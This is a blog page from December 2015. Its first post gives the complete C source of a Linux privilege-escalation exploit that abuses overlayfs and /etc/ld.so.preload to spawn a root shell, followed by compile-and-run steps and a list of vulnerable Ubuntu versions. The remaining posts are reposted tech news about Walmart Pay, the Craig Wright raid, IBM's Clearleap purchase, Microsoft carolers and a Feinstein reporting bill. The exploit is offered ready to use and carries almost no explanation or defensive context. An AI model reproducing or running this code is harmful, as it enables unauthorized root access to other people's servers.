Random Post

Friday, December 11, 2015
no image
Privilege Escalation

I will show you how hackers gain root access to your Linux VPS server. This exploit still working nowadays.
The process will be explained with details following this demo:
First: Create a C file "privilege_escalation.c

put this code in the file:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"
static char child_stack[1024*1024];
static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);
    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";
    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");
    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }
    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}
int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
    fprintf(stderr,"spawning threads\n");
    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");
        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }
            waitpid(pid, &status, 0);
        }
        waitpid(init, &status, 0);
        return 0;
    }
    usleep(300000);
    wait(NULL);
    fprintf(stderr,"child threads done\n");
    fd = open("/etc/ld.so.preload",O_WRONLY);
    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }
    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}
Second Step : Compile and Build the program :
To create the executable run this command:
user@ubuntu-server-1504:~$ gcc privilege_escalation.c -o privilege_escalation
 This will make an executable program  called privilege_escalation..

 Final Step :  Get  access to shell As root (running the exploit)

 execute the exploit by this command:
user@ubuntu-server-1504:~$ ./privilege_escalation

 This will generate a root terminal.
This exploit works on Ubuntu 12.04, 14.04, 14.10, 15.04


12:29 PM

I will show you how hackers gain root access to your Linux VPS server. This exploit still working nowadays. The process will be e...

Read more »
Posted by sw at 12:29 PM 0 comments
Labels: , ,
Thursday, December 10, 2015
no image
Walmart Jumps Into Mobile Pay Fray

Walmart on Thursday introduced its own mobile payments solution to let customers make in-store purchases with an Android or iOS smartphone. The move will make it the only retailer to compete with third-party mobile payment systems.

Walmart currently is rolling out the feature through its Walmart mobile app in select stores in the northwest Arkansas area. It will expand to stores across the country by the first half of 2016, according to company spokesperson Danit Marquardt.

"The goal of Walmart Pay is simple," she told the E-Commerce Times. "Improve the checkout experience at Walmart stores and expand mobile payment access for millions of Americans."

The company sees Walmart Pay as complementary to other third-party mobile pay apps, and it is evaluating several mobile wallets that may be integrated into the Walmart Pay ecosystem in the future, Marquardt said.

Walmart Pay is designed to work with any major credit, debit, prepaid or Walmart gift card. It will allow customers to automate several functions, such as picking up of merchandise ordered online, refilling prescriptions at Walmart pharmacies, or finding a store location to purchase a particular item.

Twenty-two million people currently use the Walmart app each month, the company said, and it ranks among the top three retail apps on Google Play and the iTunes App Store.

Walmart never has offered Apple Pay or Android Pay at its stores, Marquardt confirmed.

Keeping Customer Data, Transaction Fees

One of the key reasons Walmart would choose to go in this direction could be to develop direct relationships with its customers rather than allowing third parties like Apple and Google to operate as intermediaries, observed Charles King, principal analyst at Pund-IT.

"This is something large-scale retailers and other companies have done for years, as evidenced by branded credit cards and gift cards," he told the E-Commerce Times.

It's too early to determine how well Walmart will do, as mobile payments are a small percentage of overall retail purchases, King noted. They reached about US$3.5 billion in 2014, and have been growing at a slower pace than expected.

A customer can make a Walmart Pay transaction at any register in the store by opening the Walmart app, choosing Walmart Pay, activating the camera, and then scanning the code displayed at the register. The Walmart associate then scans and bags the items being purchased. The system sends an e-receipt directly to the app.

Walmart has no plans to offer special discounts exclusively to Walmart Pay users, Marquardt said.

One of Walmart's key goals likely is to reduce the fees it pays for third-party charge card transactions, suggested Kevin Krewell, principal analyst at Tirias Research.

"When you are the scale of Walmart, a few percentage [points] of the purchases adds up to a lot of money," he told the E-Commerce Times.

Walmart belongs to the MCX Consortium, which is promoting a mobile payment system called "CurrentC," Krewell noted. CurrentC aims to compete directly with Apple Pay, but it has been delayed until 2016.

CVS and Rite Aid, two pharmacy chains that are part of the MCX Consortium, turned off the Apple Pay system at their stores last fall.

Right after that decision, a team of antitrust lawyers at Schubert, Jonckheer & Kolbe threatened to go after the chains for possible antitrust violations.

Rite Aid this summer reversed course and announced it would accept Apple Pay, Google Wallet and Android Pay.

Merchant-Owned platform

CurrentC currently is undergoing beta tests in Columbus, Ohio, according to MCX, and Walmart is one of 40 merchant partners planning a national launch.

"Walmart continues to be a strong and supportive partner of MCX and CurrentC -- and our goals remain the same -- to offer customers choices and convenience at checkout," MCX said in a statement provided to the E-Commerce Times by spokesperson Jonathan Lowe.

It remains to be seen whether the millions of Walmart customers who don't have credit or debit cards -- or in some cases, checking accounts -- will embrace the mobile app.

"There's a certain percentage of their customers who don't have cards of any type -- they're essentially bankless people," RSR Research analyst Brian Kilcourse told the E-Commerce Times.

It is not yet clear if those customers will be able to load cash directly onto the mobile app.

David Jones is a freelance writer based in Essex County, New Jersey. He has written for Reuters, Bloomberg, Crain's New York Business and The New York Times.

3:20 AM

Walmart on Thursday introduced its own mobile payments solution to let customers make in-store purchases with an Android or iOS sma...

Read more »
Posted by sw at 3:20 AM 0 comments
Labels: , ,
Wednesday, December 9, 2015
no image

Australian police on Wednesday afternoon raided the home of a shadowy figure who just hours earlier had been outed as one of the original founders of bitcoin digital currency in two separate media reports.

Identified in multiple media reports, Australian entrepreneur Craig Steven Wright was said to be the man who for years had been known as "Satoshi Nakamoto" -- widely considered the creator of the controversial bitcoin cryptocurrency.

The Australian Federal Police "conducted search warrants to assist the Australian Taxation Office at a residence in Gordon, NSW, and a business premises in Ryde, Sydney," a spokesperson confirmed in a statement provided to the E-Commerce Times.

The Taxation Office, which is the equivalent of the Internal Revenue Service in the U.S., could not comment on the taxation affairs of an individual or entity, citing confidentiality provisions in the Tax Administration Act, according to a spokesperson.

Wright's Links to Nakamoto Identity

The raid came just hours after Gizmodo and Wired each published investigative stories claiming to uncover the true identities of the bitcoin founder.

However, the raids were not conducted as the result of any such reports, police officials said.

"Satoshi Nakamoto" was the nomme de guerre of two bitcoin innovators -- Wright and U.S. computer forensics expert David Kleiman, who died in 2013, Gizmodo reported.

Wright was the chief executive officer of DeMorgan, which in 2014 announced plans to open the world's first bitcoin-based bank, called "Denaruiz Bank," according to a report in Business Insider Australia.

A cache of leaked emails, transcripts and accounting forms that link Wright to Nakamoto formed the basis of Wired's report.

The documents include correspondence between Wright and Kleiman, as well as documents dating back to 2008 that, for example, reference Wright discussing a "P2P distributed ledger" that was a record of transactions that we now know as a "blockchain." There's also a 2009 blogpost, which since has been deleted, that references Wright's plan to launch bitcoin, according to Wired.

A group of redacted documents obtained by the E-Commerce Times appear to show a meeting from February 2014 involving tax officials and Wright discussing his companies, including Hotwire Pre-eemptive Intelligence, Coin Exch Pty., Cloudcroft and other entities. The documents reference a legal advisor, Andrew Sommer, who is referenced in several reports as an attorney for Wright.

Wright's biography describes him as a former executive vice president of strategic development at the UK Centre for Strategic Cyberspace and Security Science.

Kleiman Link

Kleiman was a U.S. Army veteran from Palm Beach County, Fla., who was confined to a wheelchair following a motorcycle accident in 1995, and died in squalor with a loaded handgun and empty alcohol bottles surrounding his body, the Gizmodo report claims.

However, Kleiman had a bitcoin currency trust worth hundreds of millions of dollars, the report also claims.

The reports may not quite pass the smell test, however.

"My conclusion is that it's way too early to point to Mr Wright as the inventor of bitcoin," said Kevin Krewell, principal analyst at Tirias Research.

Even if Wright turns out to be the genuine article, the future development of the bitcoin business will not be harmed in a way that halts or reverses its growth, he said.

"The system is decentralized and can continue without its founder," Krewell told the E-Commerce Times.

"Bitcoin is not unlike Linux, where the code is contributed to by many people around the globe, but unlike Linux, the founder/inventor Satoshi Nakamoto has not taken a visible role in the technology's future," he pointed out.

As to whether Wright and Nakamoto are one and the same, "I think there are a lot of questions," said William Norton, an associate at Baker Donelson.

"The bitcoin community that I have encountered seems very skeptical. They're naturally a fairly conspiratorial group, but I think there are genuine questions outstanding," he told the E-Commerce Times.

"If we need definitive evidence, there should be a private key on the computers of the founder that would prove his identity," Norton said. "I imagine a good portion of the community will be skeptical until they see that."

Attorney Andrew Sommer, who reportedly represents Wright, was not immediately available to comment for this story.

David Jones is a freelance writer based in Essex County, New Jersey. He has written for Reuters, Bloomberg, Crain's New York Business and The New York Times.

8:10 AM

Australian police on Wednesday afternoon raided the home of a shadowy figure who just hours earlier had been outed as one of the ori...

Read more »
Posted by sw at 8:10 AM 0 comments
Labels: , ,
no image
IBM Leaps Into Video Delivery

IBM on Tuesday revealed that it has acquired Clearleap, a company that develops cloud middleware for streaming video between endpoints.

Clearleap's scalable video platform can support millions of concurrent users in the event live broadcasting is in high demand. Customers of the company, which recently raised $40 million in funding, include the NFL, Time Warner Cable, Verizon and HBO.

IBM intends to integrate Clearleap's video platform into the IBM Cloud for enterprises looking to manage, monetize and expand user video experiences and deliver them securely via the Web and mobile devices.

The acquisition is part of IBM's broader strategy for its Platform as a Service offering. Clearleap will add a new facet to that strategy: Web video.

The acquisition has the potential to create "huge, discrete business opportunities for online video," said Charles King, principal analyst for Pund-IT.

"While I expect Clearleap to continue serving and pursuing entertainment companies, like its existing clients -- HBO, Verizon, TWC and so on -- the deal clearly reflects IBM's belief that video will grow in importance among the company's enterprise customers and eventually become common in business content/communications," he told the E-Commerce Times.

The deal may appear mundane, but it will be interesting to watch how it progresses, said brand consultant Evan Carmichael.

IBM "has had 14 consecutive falls in quarterly revenue," he told the E-Commerce Times.

"They're shifting from hardware to cloud computing, and since they are forced to buy their way in since they haven't kept up on the R&D side to stay relevant, they're up against established players like Oracle and Microsoft as well as Internet-based businesses like Salesforce.com and Amazon.com," Carmichael said.

IBM declined to disclose financial details of the deal.

Head in the Clouds

As its hardware business rusts, IBM has been stepping up efforts to pivot to the cloud and establish itself as a heavyweight in the sector. While it has focused on cloud storage in all the popular flavors, as well as development, the company also has been laying the framework for Web video.

It acquired Aspera in 2013 to boost large data transfers, and this year announced it was buying Cleversafe for its object-based storage. Both of those platforms will be used to support Clearleap's platform.

IBM has its toes and fingers in range of high-tech sectors, noted Tirias Research Principal Analyst Paul Teich, who once worked with video compression technologies.

It might have been a bad use of time and money for IBM to try to build out a video delivery service from base ingredients, he told the E-Commerce Times.

"I wouldn't call it the final days of print, but we're certainly moving to a more postliterate society," Teich said. "People want to communicate directly with one another in real time, using natural communication methods, with video being one of them. So I see this as a move on IBM's part to catch up."

IBM has been playing catch-up because other cloud players are so far ahead. However, the growing strength of IBM cloud has pushed the company into a good position, and other power players, such as Amazon Web Services, are far from invincible, according to Pund-IT's King.

"That's especially the case if you take into account the problems AWS has had with its own service, like the database glitch in September that halted Netflix's and Amazon's video services," he said.

Video on Demand, in Demand

Video has become increasingly important, and quality matters a great deal, according to Teich. People care about color accuracy, compression artifacts and a stable frame rate.

"People are visual creatures," he said. "When you look at how much we understand through our eyes and how quickly we understand it, it's perhaps the dominant sense that we have in terms of sensing the world around us and interacting with other people."

It isn't easy to deliver the "high bandwidth our eyes want to see," Teich said. These days, people want Web delivery of content to their mobile devices -- "cloud first, mobile first," as Microsoft once phrased it.

Purchasing Clearleap "is a good catch-up move," he said. "Certainly it's not too late for anything."

Quinten Plummer is a longtime technology reporter and an avid PC gamer who explored local news for a few years, covering law enforcement and government beats, before returning to writing about things run by ones and zeros and the people who make them. If it pushes pixels or improves lives, he wants to learn all he can about it.

6:34 AM

IBM on Tuesday revealed that it has acquired Clearleap, a company that develops cloud middleware for streaming video between endpo...

Read more »
Posted by sw at 6:34 AM 0 comments
Labels: , ,
no image
Microsoft and Apple Share a Peaceful Moment

Can you imagine Microsoft and Apple actually liking each other? Who'da thunk such a thing was even possible? However, the holiday spirit is alive and well at Microsoft. The company flew a bunch of workers from around the country into New York City for something very special.

Microsoft workers and a local NYC children's youth choir met at Microsoft's new Fifth Avenue store to spread some special holiday cheer. Their goal was to share a message of peace and harmony with Microsoft's neighbor down the street... Apple.

The Microsoft employees and the youth choir broke into song as they walked from their Fifth Avenue location to the iconic Apple store near Central Park -- you know, that big, clear, square block with the giant Apple logo on the side.

What happened next was very inspiring. The carolers brought the Apple workers out of the store, and they all enjoyed a touching moment with many other New Yorkers watching, but not believing what they were seeing.

Could this be the beginning of a new era of peace and prosperity between these two tech giants? Perhaps. If nothing else, this is a great first step. Microsoft is saying "let there be peace." Not bad.

We don't yet know how Apple will respond, but I would expect to see chapter two coming soon.

Reagan and Gorbachev

Not so long ago, Russia was the big, bad enemy of the U.S. President Ronald Reagan and Mikhail Gorbachev really shook things up, though. They became friendly, and the resistance softened. Reagan's policy of "trust, but verify" was necessary, due to the longstanding feud.

Things were quite nice for a while. After a few decades, though, the walls went back up, and we are now back to where we started.

New Microsoft CEO Satya Nadella must have given the go-ahead for the New York City gesture. That is a good sign. He seems to have a fresh new understanding of the marketplace and his role at this time in history. He seems to understand that people use many different devices, often from competing brands -- yet they want them all to work well together.

So the question is, can Nadella soften the heart of Apple CEO Tim Cook? That's the big question. Let's hope so. These are two new leaders in a new chapter. New thinking should be welcomed by all right now.

We Can Hope for Peace

Perhaps we can enter a new age. Perhaps Microsoft and Apple actually can become less combative. Sure, they will have to live in a world of "trust, but verify" for a long while. However, wouldn't it be a better world if everyone could sit down and have a cup of coffee together once in a while?

Will this appeal for peace go beyond a gesture? Who knows? However, one thing we can enjoy today is how the holiday spirit really seems to be changing things on the tech battlefield. Let's hope it continues to spread.

E-Commerce Times columnist Jeff Kagan is a wireless analyst, telecom analyst, industry analyst, consultant and speaker who has been sharing his colorful perspectives on the changing industry for 25 years. Email him at jeff@jeffKAGAN.com.

6:15 AM

Can you imagine Microsoft and Apple actually liking each other? Who'da thunk such a thing was even possible? However, the holid...

Read more »
Posted by sw at 6:15 AM 0 comments
Labels: , ,
no image
Feinstein Revives Terrorist Activity Reporting Bill

Sen. Dianne Feinstein, D-Calif., on Tuesday reintroduced a bill that would require technology companies to alert law enforcement of certain activities that might be related to terrorist threats.

Cosponsored by Sen. Richard Burr, R-N.C., the Requiring Reporting of Online Terrorist Activity Act would mandate that technology companies notify authorities of communications regarding attack planning, recruitment, or distribution of information relating to explosives if they should become aware of that activity. The bill would not require active monitoring or force them to actively search for such activity.

Feinstein earlier this year failed to attach a similar bill to the Senate Intelligence Authorization Act. However, because the current version is modeled on existing legislation that requires the reporting of online child pornography, it might have a better chance of success.

The Child Porn Connection

Terrorist organizations like ISIL are using social media to reinvent how they recruit and plot attacks, Feinstein said, and the government needs help from technology companies to thwart them.

"This bill doesn't require companies to take any additional actions to discover terrorist activity," Feinstein emphasized. "It merely requires them to report such activity to law enforcement when they come across it. Congress needs to do everything we can to help intelligence and law enforcement agencies identify and prevent terrorist attacks, and this bill is a step in the right direction."

The act is not limited to social media companies; it applies to any operation that provides an "electronic communication service or remote computing service" to the public. That arguably could include libraries, cafes and other places that provide technology services.

The current bill is the same as the one that was approved by the Senate Intelligence Committee in June, which was removed in order to secure passage of the more comprehensive Senate Intelligence Authorization Act.

Sen. Ron Wyden, D-Ore., one of the earlier bill's chief critics, on Tuesday tweeted that he would oppose the reintroduced version, because it would make technology companies reluctant to cooperate.

"I'm opposed to this proposal because I believe it will undermine that collaboration and lead to less reporting of terrorist activity, not more," he said.

FBI Director James Comey earlier this year testified that social media companies were "pretty good at telling us what they see," Wyden noted.

Feinstein reintroduced the bill following last week's mass shooting in San Bernardino. Tashfeen Malik, one of the suspects, reportedly posted her allegiance to ISIS on her Facebook page before the attack.

Facebook deleted the posts, as per policy, according to Feinstein's office.

In another case, British citizen Junaid Hussein, a recruiter and hacker for ISIS, contacted several individuals in the U.S. and UK through multiple Twitter accounts, inciting several attempted attacks prior to his death in a U.S. drone strike earlier this year.

An official familiar with Google's policy, who requested anonymity, said the company was on board with a strong effort to combat terrorism, but said "we aren't confident this is the best approach," as the term 'terrorist activity" in the legislation is overly broad.

Twitter did not address the Feinstein legislation directly but did confirm that it has teams around the world actively investigating reports of rule violations, and noting that it works with law enforcement entities around the world when appropriate.

Tech, Privacy Advocates Not Having It

The proposed bill will do more harm than good to the privacy rights of ordinary citizens engaged in political speech, according to privacy advocates, who have argued that it would put tech companies in an uncomfortable position and open the process to government abuse.

"This proposal is identical to the one last summer that was roundly criticized by tech companies, Internet advocates and politicians alike before it died a natural death," said Michael McCloud Ball, chief of staff at the ACLU's Washington office.

The bill is so vaguely worded that "innocent social media users" would feel the most impact after being "swept up in an overzealous attempt to comply" with the mandate, he told the E-Commerce Times.

The policy would lead some companies to be overzealous, while others would stick their heads in the sand, warned Emma Llansó, director of the Free Expression Project at the Center for Democracy & Technology.

"Some would decide to significantly over-report their customers' information and private communications to the U.S. government to ensure that the company stays on the right side of the law," she reasoned. "Others would refuse to review any content that was flagged to them, for fear that doing so would mean they obtain the 'actual knowledge of any terrorist activity' that triggers the reporting obligation."

David Jones is a freelance writer based in Essex County, New Jersey. He has written for Reuters, Bloomberg, Crain's New York Business and The New York Times.

3:20 AM

Sen. Dianne Feinstein, D-Calif., on Tuesday reintroduced a bill that would require technology companies to alert law enforcement of...

Read more »
Posted by sw at 3:20 AM 0 comments
Labels: , ,
Subscribe to: Posts (Atom)
 
Google Analytics Alternative